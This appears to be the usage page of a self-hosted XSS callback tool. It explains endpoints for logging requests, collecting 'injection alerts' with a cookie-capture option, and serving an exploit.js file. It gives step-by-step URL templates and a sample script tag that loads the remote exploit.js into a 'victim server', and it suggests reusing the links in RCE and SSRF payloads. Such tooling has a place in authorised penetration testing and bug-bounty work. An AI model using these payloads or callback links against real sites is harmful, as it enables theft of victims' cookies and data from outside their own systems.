Get Started

Please make sure that you have set up all your variables inside the .env file before reading

Endpoints:

  • /logger/{your_code} : This is where you make normal requests to (for request logging).
  • /: This is where you request to generate injection alerts. There are query string parameters such as url, by, code, plaintext, cookie, and b64.
  • /exploit.js: This is where the exploit.js file lies, you can link this js file remotely to the victim server with the script tag.
Parameters:
  • url: Specifies location of the current document/webpage
  • by: Specifies username of the user that sent this payload
  • an action parameter (choices: plaintext, b64, cookie, or none (leave blank))
  • xss: Specifies if it's an XSS attack
  • code: This parameter is required as you need your code to access the endpoints (it is the same code in your .env file)
Headers for XSS testing
  • xsend-xss-payload header (This header is used to track which XSS payload was used when detection is successful)

How to use the alerts webhook:

  • 1.) You must first decide which action parameter to use plaintext, b64, or cookie, or none (leave blank)
  • 2.) In this case I choose plaintext
  • 3.) Then remember the required parameters: url, code, and by
  • 4.) Craft the URL with those, http://localhost:4000/?url=victim_url&code=yourcode&by=yourusername&plaintext=
  • 5.) Inject this inside of an html tag or javascript code that will make a request to this url

How to use the logger webhook:

  • 1.) code is the only required parameter for this
  • 2.) Craft the URL to the logger endpoint http://localhost:4000/logger/{your_code}/{custom_message}

  • Example: http://localhost:4000/logger/123456/anythingblahblah

How to link to the exploit.js script:

  • 1.) Craft the URL to the JS file http://localhost:4000/exploit.js
  • 2.) Embed in the script tag <script src="http://localhost:4000/exploit.js"></script>

Now you can craft all the links into your XSS/HTML payload or even use it in other injection attacks that supports HTTP requests like some RCE and SSRF contexts. Check the generator here: Generator